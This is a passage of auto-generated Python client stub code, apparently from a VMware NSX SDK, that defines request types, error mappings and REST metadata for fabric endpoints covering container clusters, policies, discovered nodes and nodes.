get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-cluster-nodes/{container-cluster-node-id}',
path_variables={
'container_cluster_node_id': 'container-cluster-node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'container_cluster_id': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-cluster-nodes',
path_variables={
},
query_parameters={
'container_cluster_id': 'container_cluster_id',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerClusterNode'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerClusterNodeListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.container_cluster_nodes',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ContainerClustersStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'container_cluster_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-clusters/{container-cluster-id}',
path_variables={
'container_cluster_id': 'container-cluster-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cluster_type': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'infra_type': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-clusters',
path_variables={
},
query_parameters={
'cluster_type': 'cluster_type',
'cursor': 'cursor',
'included_fields': 'included_fields',
'infra_type': 'infra_type',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerCluster'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerClusterListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.container_clusters',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ContainerIngressPoliciesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'ingress_policy_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-ingress-policies/{ingress-policy-id}',
path_variables={
'ingress_policy_id': 'ingress-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'container_cluster_id': type.OptionalType(type.StringType()),
'container_project_id': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-ingress-policies',
path_variables={
},
query_parameters={
'container_cluster_id': 'container_cluster_id',
'container_project_id': 'container_project_id',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerIngressPolicy'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerIngressPolicyListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.container_ingress_policies',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ContainerNetworkPoliciesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'network_policy_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-network-policies/{network-policy-id}',
path_variables={
'network_policy_id': 'network-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'container_cluster_id': type.OptionalType(type.StringType()),
'container_project_id': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-network-policies',
path_variables={
},
query_parameters={
'container_cluster_id': 'container_cluster_id',
'container_project_id': 'container_project_id',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerNetworkPolicy'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerNetworkPolicyListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.container_network_policies',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ContainerProjectsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'container_project_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-projects/{container-project-id}',
path_variables={
'container_project_id': 'container-project-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'container_cluster_id': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/container-projects',
path_variables={
},
query_parameters={
'container_cluster_id': 'container_cluster_id',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerProject'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerProjectListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.container_projects',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _DiscoveredNodesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for createtransportnode operation
createtransportnode_input_type = type.StructType('operation-input', {
'node_ext_id': type.StringType(),
'transport_node': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
})
createtransportnode_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
createtransportnode_input_value_validator_list = [
HasFieldsOfValidator()
]
createtransportnode_output_validator_list = [
HasFieldsOfValidator()
]
createtransportnode_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/discovered-nodes/{node-ext-id}?action=create_transport_node',
request_body_parameter='transport_node',
path_variables={
'node_ext_id': 'node-ext-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'node_ext_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/discovered-nodes/{node-ext-id}',
path_variables={
'node_ext_id': 'node-ext-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for hostprep operation
hostprep_input_type = type.StructType('operation-input', {
'node_ext_id': type.StringType(),
})
hostprep_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
hostprep_input_value_validator_list = [
]
hostprep_output_validator_list = [
HasFieldsOfValidator()
]
hostprep_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/discovered-nodes/{node-ext-id}?action=hostprep',
path_variables={
'node_ext_id': 'node-ext-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cm_local_id': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'display_name': type.OptionalType(type.StringType()),
'external_id': type.OptionalType(type.StringType()),
'has_parent': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'ip_address': type.OptionalType(type.StringType()),
'node_id': type.OptionalType(type.StringType()),
'node_type': type.OptionalType(type.StringType()),
'origin_id': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'parent_compute_collection': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/discovered-nodes',
path_variables={
},
query_parameters={
'cm_local_id': 'cm_local_id',
'cursor': 'cursor',
'display_name': 'display_name',
'external_id': 'external_id',
'has_parent': 'has_parent',
'included_fields': 'included_fields',
'ip_address': 'ip_address',
'node_id': 'node_id',
'node_type': 'node_type',
'origin_id': 'origin_id',
'page_size': 'page_size',
'parent_compute_collection': 'parent_compute_collection',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for reapplyclusterconfig operation
reapplyclusterconfig_input_type = type.StructType('operation-input', {
'node_ext_id': type.StringType(),
})
reapplyclusterconfig_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
reapplyclusterconfig_input_value_validator_list = [
]
reapplyclusterconfig_output_validator_list = [
HasFieldsOfValidator()
]
reapplyclusterconfig_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/discovered-nodes/{node-ext-id}?action=reapply_cluster_config',
path_variables={
'node_ext_id': 'node-ext-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'createtransportnode': {
'input_type': createtransportnode_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
'errors': createtransportnode_error_dict,
'input_value_validator_list': createtransportnode_input_value_validator_list,
'output_validator_list': createtransportnode_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'DiscoveredNode'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'hostprep': {
'input_type': hostprep_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': hostprep_error_dict,
'input_value_validator_list': hostprep_input_value_validator_list,
'output_validator_list': hostprep_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'DiscoveredNodeListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'reapplyclusterconfig': {
'input_type': reapplyclusterconfig_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
'errors': reapplyclusterconfig_error_dict,
'input_value_validator_list': reapplyclusterconfig_input_value_validator_list,
'output_validator_list': reapplyclusterconfig_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'createtransportnode': createtransportnode_rest_metadata,
'get': get_rest_metadata,
'hostprep': hostprep_rest_metadata,
'list': list_rest_metadata,
'reapplyclusterconfig': reapplyclusterconfig_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.discovered_nodes',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _NodesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'node': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/nodes',
request_body_parameter='node',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for create_0 operation
create_0_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
create_0_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_0_input_value_validator_list = [
]
create_0_output_validator_list = [
]
create_0_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
'unprepare_host': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/fabric/nodes/{node-id}',
path_variables={
'node_id': 'node-id',
},
query_parameters={
'unprepare_host': 'unprepare_host',
},
content_type='application/json'
)
# properties for delete_0 operation
delete_0_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
delete_0_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_0_input_value_validator_list = [
]
delete_0_output_validator_list = [
]
delete_0_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/fabric/nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/nodes/{node-id}',
path_variables={
'node_id': 'node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get_0 operation
get_0_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
get_0_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
